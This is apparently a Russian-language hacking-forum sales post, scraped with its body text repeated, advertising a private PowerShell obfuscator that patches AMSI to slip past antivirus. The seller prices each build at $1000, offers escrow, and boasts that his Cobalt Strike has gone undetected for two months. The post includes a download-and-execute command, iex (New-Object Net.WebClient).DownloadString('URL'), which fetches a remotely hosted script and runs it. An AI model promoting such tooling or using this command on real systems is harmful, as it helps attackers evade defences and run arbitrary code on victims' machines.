Есть обфускатор/кодогенератор для патча амси в Powershell. Продукт писался с нуля под приват.
Каждый выход кода начинается от 1к строк до бесконечности (ибо можно задавть глубину обфускации кода).
На выдаче чистый скрипт, который при каждой генерации имеет почти 100% (выше 90%) уникальность, что дает возможность каждому клиенту
иметь свою чистую версию скрипта. В коде не содержатся строки (на которые в основном детектит амси, есть небольшая
антиэмуляция в случае скипа авером - код не соберется). Достаточно разместить код на том же пастбине, открыть powershell.exe
iex (New-Object Net.WebClient).DownloadString('URL') ввести команду указывая ссылку на скрипт и после исполнения выполнять
любые команды.
Стоимость одного крипта - 1к$
Детекта не будет долгое время (мой кобальт страйк держится уже 2 месяца с активным использованием)
Продажа каждого скрипта - строго в одни руки
На гаранта согласен без проблем (тут и на дамаге)
Людям с репой и депом кидаю первым
По всем контактам прошу в ПМ.
Актуально будет всегда до закрытия топика мной, на форуме каждый день.
Пруфы:
1 - Патч амси
2 - Сравнение уникальности крипта
dropmefiles.com
пасс местный
Каждый выход кода начинается от 1к строк до бесконечности (ибо можно задавть глубину обфускации кода).
На выдаче чистый скрипт, который при каждой генерации имеет почти 100% (выше 90%) уникальность, что дает возможность каждому клиенту
иметь свою чистую версию скрипта. В коде не содержатся строки (на которые в основном детектит амси, есть небольшая
антиэмуляция в случае скипа авером - код не соберется). Достаточно разместить код на том же пастбине, открыть powershell.exe
iex (New-Object Net.WebClient).DownloadString('URL') ввести команду указывая ссылку на скрипт и после исполнения выполнять
любые команды.
Стоимость одного крипта - 1к$
Детекта не будет долгое время (мой кобальт страйк держится уже 2 месяца с активным использованием)
Продажа каждого скрипта - строго в одни руки
На гаранта согласен без проблем (тут и на дамаге)
Людям с репой и депом кидаю первым
По всем контактам прошу в ПМ.
Актуально будет всегда до закрытия топика мной, на форуме каждый день.
Пруфы:
1 - Патч амси
2 - Сравнение уникальности крипта
DropMeFiles – free one-click file sharing service
Share your pictures, send large videos, exchange music or transfer big files. No registration required. Unlimited upload/download speed.
dropmefiles.com
Последнее редактирование модератором: